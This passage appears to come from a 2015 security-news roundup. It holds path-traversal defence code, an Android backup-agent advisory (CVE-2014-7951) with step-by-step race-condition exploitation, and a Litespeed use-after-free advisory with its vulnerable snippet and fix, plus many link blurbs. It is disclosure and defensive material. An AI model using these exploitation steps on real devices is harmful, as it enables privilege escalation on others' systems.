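    while (std::getline(ss, part, '/')) parts.push_back(part);
    return parts;
}

// An MTP object name is a bare file name, never a path: reject separators,
// NUL bytes, empty names and the special entries "." and "..".
bool isValidMtpObjectName(const std::string &name) {
    if (name.empty() || name == "." || name == "..") return false;
    for (char c : name) {
        if (c == '/' || c == '\\' || c == '\0') return false;
    }
    return true;
}

// Lexically normalise a relative archive entry so it cannot escape the
// restore root: absolute paths and any ".." that would climb above the root
// are rejected, "." and empty components are dropped. Returns the normalised
// relative path, or "" on rejection. This is a pure string check; symlinks
// already present under the root need a separate check at restore time.
std::string normaliseArchiveEntry(const std::string &entry) {
    if (entry.empty() || entry[0] == '/') return "";
    std::vector<std::string> stack;
    for (const std::string &part : splitPath(entry)) {
        if (part.empty() || part == ".") continue;
        if (part == "..") {
            if (stack.empty()) return "";   // would climb above the root
            stack.pop_back();
            continue;
        }
        if (part.find('\0') != std::string::npos) return "";
        stack.push_back(part);
    }
    if (stack.empty()) return "";
    std::string out;
    for (std::size_t i = 0; i < stack.size(); ++i) {
        if (i) out += '/';
        out += stack[i];
    }
    return out;
}

// Destination under the restore root for an archive entry, or "" if the
// entry was rejected.
std::string resolveRestorePath(const std::string &root, const std::string &entry) {
    std::string rel = normaliseArchiveEntry(entry);
    return rel.empty() ? "" : root + "/" + rel;
}
```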

3. Android backup agent arbitrary code execution

The Android backup agent implementation was vulnerable to privilege
escalation through a race condition. An attacker with adb shell access
could run arbitrary code as the system (1000) user (or as any other valid
package). The attack was tested on Android OS 4.4.4.

The main problem is inside bindBackupAgent method in the
This method is exported through Binder and is available to call by the
shell user, since android.permission.BACKUP is granted for it.

The method has an ApplicationInfo parameter, which is unsecured (not
cross-validated through the PackageManager), so the uid member can be
manipulated. The supplied ApplicationInfo object is passed directly to
startProcessLocked().

Before invoking startProcessLocked, bindBackupAgent also tries to set the
stopped state for the package.
This call is bound to an additional permission
(CHANGE_COMPONENT_ENABLED_STATE), which is a system permission that not
even the shell user has.

However, there is a race condition between PackageManager and
ActivityManagerService, so this security check can be bypassed.

The existence check for the specified package happens first, in
mSettings.setPackageStoppedStateLPw(). If the package does not exist,
an IllegalArgumentException is thrown. (The permission would have been
validated only as the next step, resulting in a SecurityException.)

So, if the package does not exist, an IllegalArgumentException is thrown,
which is caught by bindBackupAgent, but execution does not stop (only a
warning is logged):

            // Backup agent is now in use, its package can't be stopped.
            try {
                        app.packageName, false,
            } catch (RemoteException e) {
            } catch (IllegalArgumentException e) {
                Slog.w(TAG, "Failed trying to unstop package "
                        + app.packageName + ": " + e);
            }

It was possible to perform the following steps in order to exploit:

1. execute "pm install helloworld.apk" (with package name

2. with another script process logcat's output and look for
the dexopt line (DexOpt: load 3ms, verify+opt 5ms, 161068 bytes)

3. trigger execution of the bindBackupAgent system call (with uid
spoofed to 1000 in ApplicationInfo) as soon as the dexopt line was seen

Since this is a race condition and timing is important, it might not
work at first. I was lucky on the 3rd attempt.

In this lucky scenario the package did not exist while
setPackageStoppedStateLPw tried to find it, but then it became available
for startProcessLocked.

At this point a new process was forked by the Zygote:

shell () grouper:/ $ ps |grep hello
ps |grep hello
system    6826  141   692340 17312 ffffffff 00000000 S

No code was executed however, since there exists an additional security
check in handleCreateBackupAgent in the ActivityThread:

            PackageInfo requestedPackage =
                    data.appInfo.packageName, 0, UserHandle.myUserId());
            if (requestedPackage.applicationInfo.uid != Process.myUid()) {
                Slog.w(TAG, "Asked to instantiate non-matching package "
                        + data.appInfo.packageName);
            }

But the process com.example.helloserver was executed with debug flags
(due to the simple fact that it was built by us and we built it as
debug) so DDMS could be attached to it.

To verify actual code execution, I added
Runtime.getRuntime().exec("touch /data/app/testSystem")
as an expression in the debugger to be evaluated by the process.

The command was executed successfully:

shell () grouper:/data/app $ ls -la testSystem
ls -la testSystem
-rw------- system   system          0 2014-08-06 01:52 testSystem

13 byte bugfix for all the above in the version control:!/

Lollipop is not affected, earlier Android versions are.

Tested on:      Android 4.4.4
Reported on:    2014-08-15
Assigned CVE:   CVE-2014-7951
Android bug id: 15829193
Discovered by:  Imre Rad / Search-Lab Ltd.


This project aims to enumerate all possible ways a website can leak HTTP requests, in one single HTML file.

more here........

Pillage the Village - The PowerShell version

I recently saw the slides of the awesome SANS webcast, "Pillage the Village Redux: More Pen Test Adventures in Post Exploitation". Ed Skoudis and John Strand demonstrated some nifty tricks which could come in really handy during a penetration test. Thanks guys! They used batch scripts, PowerShell scripts, the netsh utility and tools in Python - Gcat and Murdock.

I noticed a couple of points where using PowerShell can make some of the tricks mentioned in the webcast even better! If not better, PowerShell at least provides alternative methods. So I ended up writing some pieces of code and this blog post here..........

Paper: Modern Objective-C Exploitation Techniques

Hello again reader. Over the years the exploitation process has obviously
shifted in complexity. What once began with the straight forward case of
turning a single bug into a reliable exploit has now evolved more towards
combining vulnerability primitives together in an attempt to bypass each
of the memory protection hurdles present on a modern day operating system.

With this in mind, let's jump once again into the exploitation of
Objective-C based memory corruption vulnerabilities in a modern time.

more here.....

On false alarms in detection of DGA botnet domains – part 1

Domain Generation Algorithms are often used in botnets to create specially crafted domain names which point to C&C servers. The main purpose of this is to make it more difficult to block connections to these servers (for example with domain blacklists) or to protect the C&C channel (and the botnet itself) from a takeover. Often domains generated this way are composed of random characters, for example:, which appear nonsensical, but nevertheless allow the botmaster to manage their bots. While working on detection of algorithmically generated domains we have found examples of domains which are similar in weirdness of appearance to those used in botnets, but are utilized for different – legitimate – purposes. Identifying these domains is useful in eliminating a large number of false alarms in DGA botnet detection systems. In this entry we will describe how such domains are used in a non-malicious way, and in a future post we will look into cases which can be seen as threats.

more here.........

Binary Ninja

Binary Ninja is a set of tools to make the life of a vulnerability researcher easier, combined into a single unified interface. Whether you need to do reverse engineering, binary analysis, binary patching, or exploit development, Binary Ninja has you covered. More info here.....

The true story behind Elasticsearch storage requirements

One of our responsibilities as Solutions Architects is to help prospective users of the ELK stack figure out how many and what kind of servers they'll need to buy to support their requirements. Production deployments of the ELK stack vary significantly. Some examples of use cases we've spoken to people about include:

- Collecting and analyzing Apache and Java app server logs that support a major big box retailer's e-commerce site.
- Security information and event management (SIEM) solution provided as a service by a major telecom/network company for its customers.
- Full-text search and faceted navigation for an apartment search website.
- Organization-wide desktop/laptop systems monitoring for a public school district.

more here...........

FLARE IDA Pro Script Series: Applying Function Prototypes to Indirect Calls

The FireEye Labs Advanced Reverse Engineering (FLARE) Team would like to introduce the next installment of our IDA Pro Script series of blog posts in order to share knowledge and tools with the community here......


A Python library to handle binary program files (ELF, PE, Mach-O) here....

Hacking Games

This repository is for the presentation Hacking Games in a Hacked Game given by Rusty Wagner and Jordan Wiens at Infiltrate 2015 here....

SQLite gets fuzzershell

This is a utility program designed to aid running the SQLite library
against an external fuzzer, such as American Fuzzy Lop (AFL)
(  Basically, this program reads
SQL text from standard input and passes it through to SQLite for evaluation,
just like the "sqlite3" command-line shell.

more here..........

’s HTTP-only login page puts millions of passwords at risk

HTTPS error has been active for weeks, but few seem to have noticed

more details here.........

So, you won a regional and you’re headed to National CCDC

The 2015 National CCDC season started with 100+ teams across 10 regions. Now, there are 10 teams left and they’re headed to the National CCDC event next week. If you’re on one of those student teams, this blog post is for you. I’d like to take you inside the red team room and give you my perspective on what you can expect and some ideas that may help you win here.....

Security expert pulled off flight by FBI after exposing airline tech vulnerabilities

One of the world’s foremost experts on counter-threat intelligence within the cybersecurity industry, who blew the whistle on vulnerabilities in airplane technology systems in a series of recent Fox News reports, has become the target of an FBI investigation himself.

Chris Roberts of the Colorado-based One World Labs, a security intelligence firm that identifies risks before they're exploited, said two FBI agents and two uniformed police officers pulled him off a United Airlines Boeing 737-800 commercial flight Wednesday night just after it landed in Syracuse, and spent the next four hours questioning him about cyberhacking of planes.

more here........


Many malicious binaries use a command and control server centralised on a dedicated domain, which is simple to operate but likely to be shut down by specialised companies like Lexsi or LEAs. Malware authors have been using decentralised network infrastructures for a few years to ensure their botnet will be more resilient, implying the development of new tools to monitor their evolution. CERT-LEXSI is using “lofts” for that purpose, that is to say virtual machines specially configured to decrypt communications in real time and extract banking malware configuration files and look for newly targeted banks.

more here..........

MS15-034 Detection: Some Observations

Several detection rules (SNORT, F5, …) are being published these days to detect exploitation of vulnerability MS15-034.

If you are making or modifying such detection rules, I want to share some observations with you here.....

Apache Cassandra JMX/RMI Remote Code Execution & Cisco Cloud Web Security Connector JMX/RMI Remote Code Execution

Apache Cassandra was found to bind an unauthenticated JMX/RMI service on all network interfaces. An adversary with network access may abuse this service and achieve arbitrary remote code execution as the running user.

more here...........

A vulnerability exists in Cisco Cloud Web Security Connector which allows unauthenticated users to gain unauthorised access with administrative privileges on the target host. Cisco confirmed this vulnerability and assigned CVE-2015-0689.

more here..........

WikiLeaks publishes an analysis and search system for The Sony Archives: 30,287 documents from Sony Pictures Entertainment (SPE)

WikiLeaks publishes an analysis and search system for The Sony Archives: 30,287 documents from Sony Pictures Entertainment (SPE) and 173,132 emails, to and from more than 2,200 SPE email addresses.

more here......


Python In The Middle : a Python implementation of MITM attacks here........

CVE-2014-5370 - Arbitrary File Retrieval + Deletion In New Atlanta BlueDragon CFChart Servlet

Vulnerability title: Arbitrary File Retrieval + Deletion In New Atlanta BlueDragon CFChart Servlet
CVE: CVE-2014-5370
Vendor: New Atlanta
Product: BlueDragon CFChart Servlet
Affected version:
Fixed version:
Reported by: Mike Westmacott

The CFChart servlet of BlueDragon (component com.naryx.tagfusion.cfm.cfchartServlet) is vulnerable to arbitrary file retrieval due to a directory traversal vulnerability. In certain circumstances the retrieved file is also deleted.


The National High Tech Crime Unit (NHTCU) of the Netherlands’ police, the Netherlands’ National Prosecutors Office and Kaspersky Lab have been working together to fight the CoinVault ransomware campaign. During our joint investigation we have been able to obtain data that can help you to decrypt the files being held hostage on your PC. We provide both decryption keys and the decryption application.

more here.........

Beyond annoyance: security risks of unwanted ad injectors

Last month, we posted about unwanted ad injectors, a common side-effect of installing unwanted software. Ad injectors are often annoying, but in some cases, they can jeopardize users’ security as well. Today, we want to shed more light on how ad injector software can hijack even encrypted SSL browser communications.

Andromeda/Gamarue bot loves JSON too (new versions details)

After my last post about Andromeda different updates related to version 2.07 and 2.08 appeared. Mostly, Fortinet was talking about the version 2.7 features and the new anti-analysis tricks of version 2.08. After that, Kimberly was also mentioning version 2.09 in his blog but I have not seen too many details about the latest versions of Andromeda. This is a summary of the interesting details about the newer versions here...........

15 Vulnerable Sites To (Legally) Practice Your Hacking Skills

15 deliberately vulnerable sites to practice your hacking skills so you can be the best defender you can – whether you’re a developer, security manager, auditor or pen-tester.

more here.....

Thursday, April 16, 2015


Today we sent a letter to lawmakers expressing security experts' opposition to the Cybersecurity Information Sharing Act (CISA) as well as two other pending bills that purport to be about security information sharing, the Protecting Cyber Networks Act (PCNA), and the National Cybersecurity Protection Advancement Act of 2015. These experts agree that the information sharing bills unnecessarily waive privacy rights because they focus on sharing information beyond that needed for cybersecurity.

more here........

Reverse Engineered: Capcom CPS1 - Part 1

For most of the 80's, arcade titles were the product of intense hardware and software custom design work. With every new game title came a new board design and the full dedication of multiple specialized teams including experts in hardware, electronics, software, game design, graphics, sound... the list goes on and on.

Competition, faster release cycles, and the need for continued improved financial results, drove arcade manufacturers into operational optimization and standardization efforts with the ultimate goal of focusing into their true core business: producing successful video games, not hardware.

With the introduction in 1988 of the Capcom Play System 1 (CPS-1) by Capcom, the company signaled a new era in game design quality and hardware platform maturity.

more here.........

PHP 5.6.8 is released

The changelog is here and it's recommended you upgrade

more here....

Open Litespeed Use After Free Vulnerability

(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq


Open Litespeed Use After Free Vulnerability
Affected versions: Open Litespeed <= 1.3.9


A use after free vulnerability was discovered within the header parser
of the Open Litespeed web server. This vulnerability can be successfully
exploited to trigger an out of bounds memory read, resulting in a
segmentation fault crashing the web server.

By sending a crafted request, an attacker may trigger an out-of-bounds
memory read, crashing the web server. This is due to a portion of memory
being referenced by the application after being freed by a realloc() call.

The second parameter (p) to the memmove() call (line 741, httpreq.cpp)
within the HttpReq::newKeyValueBuf method results in an out-of-bounds
memory read when the attacker submits crafted requests containing a large
number of header rows. This is due to the portion of memory the 'p'
parameter resides in being freed by a realloc() call. The reallocation
is performed by the allocate() method of the AutoBuf class. This is
triggered by the call to AutoBuf's grow() method within the
newKeyValueBuf method (line 736, httpreq.cpp). The newKeyValueBuf method
snippet is detailed below, showing the call to AutoBuf::grow() and the
subsequent memmove() call:

 735         if ( m_reqBuf.available() < total )
 736             if ( m_reqBuf.grow( total ) )
 737                 return NULL;
 738         char * pNewBuf = m_reqBuf.end();
 739         m_reqBuf.used( total );
 740         if ( orgSize > 0 )
 741             memmove( pNewBuf, p, sizeof( int ) * 2 + sizeof( key_value_pair ) * orgSize );
 742         else
 743             *( ((int *)pNewBuf) + 1 ) = 0;
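As an added illustration, not code from Open Litespeed, here is the pattern above reduced to a small growable buffer: the vulnerable shape keeps a raw pointer (p) across grow(), the fixed shape keeps an offset and re-derives the pointer afterwards. GrowBuf, copyAfterGrowIsSafe and appendCopy are hypothetical names, and grow() moves the block explicitly so the outcome is deterministic:

```cpp
// Added example, not Open Litespeed code: a minimal growable buffer that
// reproduces the stale-pointer pattern described above, beside the usual
// fix. Names are hypothetical; the real AutoBuf/HttpReq are more involved.
#include <cstddef>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <vector>

// Growable buffer in the spirit of AutoBuf. grow() moves the block (allocate,
// copy, free: what a moving realloc() does, spelt out so the example is
// deterministic), so a raw pointer taken before grow() may be dangling after.
class GrowBuf {
public:
    explicit GrowBuf(std::size_t cap) : m_buf(static_cast<char *>(std::malloc(cap))), m_cap(cap), m_used(0) {}
    ~GrowBuf() { std::free(m_buf); }
    std::size_t available() const { return m_cap - m_used; }
    char *begin() const { return m_buf; }
    char *end() const { return m_buf + m_used; }
    void used(std::size_t n) { m_used += n; }
    int grow(std::size_t need) {   // non-zero on failure, as AutoBuf::grow()
        char *nb = static_cast<char *>(std::malloc(m_cap * 2 + need));
        if (!nb) return -1;
        std::memcpy(nb, m_buf, m_used);
        std::free(m_buf);
        m_buf = nb;
        m_cap = m_cap * 2 + need;
        return 0;
    }
    bool contains(std::uintptr_t addr, std::size_t len) const {   // inside the live block?
        return addr >= reinterpret_cast<std::uintptr_t>(m_buf) && addr + len <= reinterpret_cast<std::uintptr_t>(m_buf) + m_cap;
    }
private:
    char *m_buf;
    std::size_t m_cap, m_used;
};

// Vulnerable shape: p points into the buffer, grow() may move the block,
// and the copy that follows reads from p. Instead of performing that read
// (undefined behaviour) this reports whether p still lies inside the live
// allocation afterwards, i.e. whether the memmove() would have been safe.
bool copyAfterGrowIsSafe(GrowBuf &buf, const char *p, std::size_t total) {
    std::uintptr_t addr = reinterpret_cast<std::uintptr_t>(p);   // before grow()
    if (buf.available() < total)
        if (buf.grow(total)) return false;
    return buf.contains(addr, total);
}

// Fixed shape: keep p as an offset from the buffer base across grow() and
// re-derive the pointer from the (possibly new) base before copying.
char *appendCopy(GrowBuf &buf, const char *p, std::size_t total) {
    std::ptrdiff_t off = p - buf.begin();   // p must point into buf
    if (buf.available() < total)
        if (buf.grow(total)) return nullptr;
    p = buf.begin() + off;                  // valid again after the move
    char *pNewBuf = buf.end();
    buf.used(total);
    std::memmove(pNewBuf, p, total);
    return pNewBuf;
}

// Constructed scenario: an 8-byte buffer that is already full, so copying
// its first n bytes to the end forces grow().
static void fillDemo(GrowBuf &buf) { std::memcpy(buf.end(), "ABCDEFGH", 8); buf.used(8); }
bool demoUnsafeDetected() {   // true: the vulnerable shape would read freed memory
    GrowBuf buf(8);
    fillDemo(buf);
    return !copyAfterGrowIsSafe(buf, buf.begin(), 4);
}
std::vector<char> demoAppend(std::size_t n) {   // the fixed shape, end to end
    GrowBuf buf(8);
    fillDemo(buf);
    char *out = appendCopy(buf, buf.begin(), n);
    return out ? std::vector<char>(out, out + n) : std::vector<char>();
}
```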

Further information is available in the advisory PDF. POC exploit code
can be found at

| Solution |
Update to the latest version of the Open Litespeed web server

| Disclosure Timeline |
26/03/2015 - Advisory sent to Litespeed
27/03/2015 - Response from Litespeed stating the vulnerability will be
fixed in the next release of Open Litespeed
10/04/2015 - Open Litespeed 1.3.10 released
14/04/2015 - Advisory PDF released

is Australasia's leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to provide
the very best independent advice and a high level of technical expertise,
creating long and lasting professional relationships with our clients. is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendors' products. Members of the R&D team are globally recognised through their publication
of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings,
contact us:

Email info () security-assessment com
Phone +64 4 470 1650